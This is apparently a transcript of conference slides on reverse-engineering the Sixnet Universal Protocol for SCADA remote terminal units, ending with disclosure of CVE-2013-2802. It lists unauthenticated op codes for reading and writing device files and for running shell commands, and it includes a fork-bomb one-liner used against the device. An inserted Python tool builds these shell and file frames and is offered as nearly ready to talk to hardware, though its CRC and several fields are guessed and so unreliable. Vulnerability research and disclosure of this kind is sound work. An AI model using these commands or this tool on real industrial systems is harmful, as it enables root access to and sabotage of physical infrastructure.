Post on 14-Jan-2016
Sixnet Tools presentation
• Slight overview of ICS environment
• The Sixnet Universal Protocol
• Fun stuff to do with it
Some
• NextGen Firewalls
• Advanced Persistent Threat
• Cloud
• IPS/IDS 2.0
• MDM
• SaaS
• IaaS
• Google
About Me
• Doctoral Student
• Graduate Research Assistant at UofL
• Intelligent Systems Research Lab
• Bourbon Enthusiast
Sixnet Tools
For Poking at Sixnet Things
SCADA Networks
ICS: Industrial Control System
SCADA: Supervisory Control And Data Acquisition
Sixnet I/O Toolkit
HMI: Human Machine Interface
RTU: Remote Terminal Unit
(Diagram: Operator on HMI, RTU, Substation)
Modbus op codes

Function type                            Function name                      Function code
Data Access
  Bit access
    Physical Discrete Inputs             Read Discrete Inputs                2
    Internal Bits or Physical Coils      Read Coils                          1
                                         Write Single Coil                   5
                                         Write Multiple Coils               15
  16-bit access
    Physical Input Registers             Read Input Register                 4
    Internal Registers or                Read Holding Registers              3
    Physical Output Registers            Write Single Register               6
                                         Write Multiple Registers           16
                                         Read/Write Multiple Registers      23
                                         Mask Write Register                22
                                         Read FIFO Queue                    24
  File Record Access                     Read File Record                   20
                                         Write File Record                  21
Diagnostics                              Read Exception Status               7
                                         Diagnostic                          8
                                         Get Com Event Counter              11
                                         Get Com Event Log                  12
                                         Report Slave ID                    17
                                         Read Device Identification         43
Other                                    Encapsulated Interface Transport   43

(Function code 43 appears twice because Read Device Identification is carried inside the Encapsulated Interface Transport, as MEI type 14.)
Modbus Protocol
• Address 2
• Op code 2
• Data n
• Checksum 2

(Sizes as listed on the slide. In the Modbus RTU specification the address and the function code are one byte each, followed by n data bytes and a two-byte CRC-16 sent low byte first. Nothing in the frame identifies or authenticates the sender.)
Problem?
Sixnet Universal Protocol
• Lead 1
• Length 1
• Destination 1
• Source 1
• Session 1
• Sequence 1
• Op Code 1
• Data n
• CRC 2
Reversing
Blinkenlights
Telnet, FTP
Get File Descriptor
Request:  Op Code 1a, Data 00:03:00:[file path]:00 (open for read)
          Op Code 1a, Data 03:03:[4-byte file size]:[file path]:00 (open for write)
Response: Op Code 01, Data [FD]

File manipulation
Request:  Op Code 1a, Data 06:[FD] (read)
          Op Code 1a, Data 02:[FD]:[4B start]:[2B length]:[data] (write)
Response: Op Code 01, Data [FD]:[start]:[length]:[data] (read)
          Op Code 01, Data 00:[FD] (write)
MORE SNIFFING!
Shell Commands
Request:  Op Code d0, Data 1e:01:00:[command]:00
Response: Op Code 01, Data 00:[length]:[output]
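As an added, runnable illustration of the two frame layouts above (the Modbus RTU frame and the Sixnet Universal Protocol frame) and of the file and shell messages just listed, here is Python that builds and parses both kinds of frame and the op-code 1a / d0 payloads. This is example code written for this page, not code from the talk or from the my-sixnet-tools project. The field sizes, op codes and data patterns are taken from the slides; everything else is an assumption and is marked as such in the code: the Lead byte value (0x1B), the meaning of Length (every byte after it, CRC included), the Sixnet CRC algorithm (CRC-16/MODBUS is used as a stand-in because the slides do not give the real one, so a device will reject these frames until the correct CRC is substituted), big-endian multi-byte sizes and offsets, and the one-byte length in the shell reply. The reply bytes in the demo are constructed, not captured. For Modbus the code follows the specification (one-byte address and function code) rather than the slide's sizes.

```python
"""Modbus RTU and Sixnet Universal Protocol frame helpers (added example, not the talk's code)."""
import struct


def crc16_modbus(data: bytes) -> int:
    """CRC-16/MODBUS: init 0xFFFF, reflected polynomial 0xA001, no final XOR."""
    crc = 0xFFFF
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc


# ---- Modbus RTU: [unit 1][function 1][data n][CRC 2, low byte first] (per spec) ----
FC_READ_COILS, FC_READ_HOLDING, FC_WRITE_SINGLE_COIL = 1, 3, 5


def modbus_frame(unit: int, function: int, payload: bytes) -> bytes:
    body = bytes([unit, function]) + payload
    return body + struct.pack("<H", crc16_modbus(body))


def modbus_read_holding_registers(unit: int, start: int, count: int) -> bytes:
    return modbus_frame(unit, FC_READ_HOLDING, struct.pack(">HH", start, count))


def modbus_write_single_coil(unit: int, addr: int, on: bool) -> bytes:
    # 0xFF00 switches the coil on, 0x0000 off; nothing in the frame authenticates the sender.
    return modbus_frame(unit, FC_WRITE_SINGLE_COIL, struct.pack(">HH", addr, 0xFF00 if on else 0))


def modbus_parse(frame: bytes):
    """Return (unit, function, data), or None when the frame is short or the CRC fails."""
    if len(frame) < 4:
        return None
    body, (crc,) = frame[:-2], struct.unpack("<H", frame[-2:])
    if crc16_modbus(body) != crc:
        return None
    return body[0], body[1], bytes(body[2:])


# ---- Sixnet Universal Protocol: Lead 1, Length 1, Dst 1, Src 1, Session 1, Seq 1, Op 1, Data n, CRC 2 ----
LEAD = 0x1B                                      # ASSUMED value of the Lead byte
OP_FILE, OP_SHELL, OP_REPLY = 0x1A, 0xD0, 0x01   # op codes from the slides


def sixnet_frame(dst: int, src: int, session: int, seq: int, op: int, data: bytes) -> bytes:
    if len(data) > 0xFF - 7:
        raise ValueError("data too long for a one-byte Length field")
    length = 5 + len(data) + 2                   # ASSUMED: counts dst..op, data and CRC
    body = bytes([LEAD, length, dst, src, session, seq, op]) + data
    return body + struct.pack("<H", crc16_modbus(body))   # ASSUMED CRC algorithm (stand-in)


def sixnet_parse(frame: bytes) -> dict:
    """Split a frame into its fields, rejecting bad Lead, Length or CRC."""
    if len(frame) < 9 or frame[0] != LEAD:
        raise ValueError("short frame or bad Lead byte")
    if frame[1] != len(frame) - 2:
        raise ValueError("Length field does not match frame size")
    body, (crc,) = frame[:-2], struct.unpack("<H", frame[-2:])
    if crc16_modbus(body) != crc:
        raise ValueError("CRC mismatch")
    dst, src, session, seq, op = frame[2:7]
    return {"dst": dst, "src": src, "session": session, "seq": seq, "op": op, "data": bytes(frame[7:-2])}


# Data payloads exactly as listed on the slides (op code 1a for files, d0 for the shell).
def data_open_read(path: str) -> bytes:                        # 00:03:00:[file path]:00
    return b"\x00\x03\x00" + path.encode() + b"\x00"


def data_open_write(path: str, size: int) -> bytes:            # 03:03:[4-byte file size]:[file path]:00
    return b"\x03\x03" + struct.pack(">I", size) + path.encode() + b"\x00"   # big-endian ASSUMED


def data_fd_read(fd: int) -> bytes:                            # 06:[FD]
    return bytes([0x06, fd])


def data_fd_write(fd: int, start: int, chunk: bytes) -> bytes:  # 02:[FD]:[4B start]:[2B length]:[data]
    return bytes([0x02, fd]) + struct.pack(">IH", start, len(chunk)) + chunk


def data_shell(cmd: str) -> bytes:                             # 1e:01:00:[command]:00
    return b"\x1e\x01\x00" + cmd.encode() + b"\x00"


def decode_read_reply(data: bytes):
    """Reply data [FD]:[start]:[length]:[data]; field widths ASSUMED to match the write request."""
    start, n = struct.unpack(">IH", data[1:7])
    return data[0], start, bytes(data[7:7 + n])


def decode_shell_reply(data: bytes) -> bytes:
    """Reply data 00:[length]:[output]; a one-byte length is ASSUMED."""
    if len(data) < 2 or data[0] != 0x00:
        raise ValueError("unexpected shell reply")
    return bytes(data[2:2 + data[1]])


if __name__ == "__main__":
    # Constructed exchange: the request and the reply an RTU might send, both built here.
    req = sixnet_frame(dst=1, src=0, session=0x10, seq=1, op=OP_SHELL, data=data_shell("id"))
    out = b"uid=0(root)\n"
    reply = sixnet_frame(dst=0, src=1, session=0x10, seq=1, op=OP_REPLY, data=b"\x00" + bytes([len(out)]) + out)
    print("request:", req.hex())
    print("reply  :", decode_shell_reply(sixnet_parse(reply)["data"]))
    print("modbus :", modbus_read_holding_registers(1, 0, 10).hex())
```

The parser is deliberately strict (Lead, Length and CRC all checked) so it can double as a sniffer-side validator; the builders are the request side of each exchange on the slides. Swapping in the device's real CRC routine is the only change needed to talk to hardware.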
Pseudo-Shell
Fork Bomb
BOOM!
p(){ p|p& }; p
QUESTIONS?
Reporting
CVE-2013-2802
Sixnet firmware 4.8
• Read coils
• Write coils
• Read file system
• Write file system
• Administrative access to the OS
QUESTIONS?
Intelligent Systems Research Lab
University of Louisville
https://code.google.com/p/my-sixnet-tools/
Mehdi Sabraoui
Sabraoui.m@gmail.com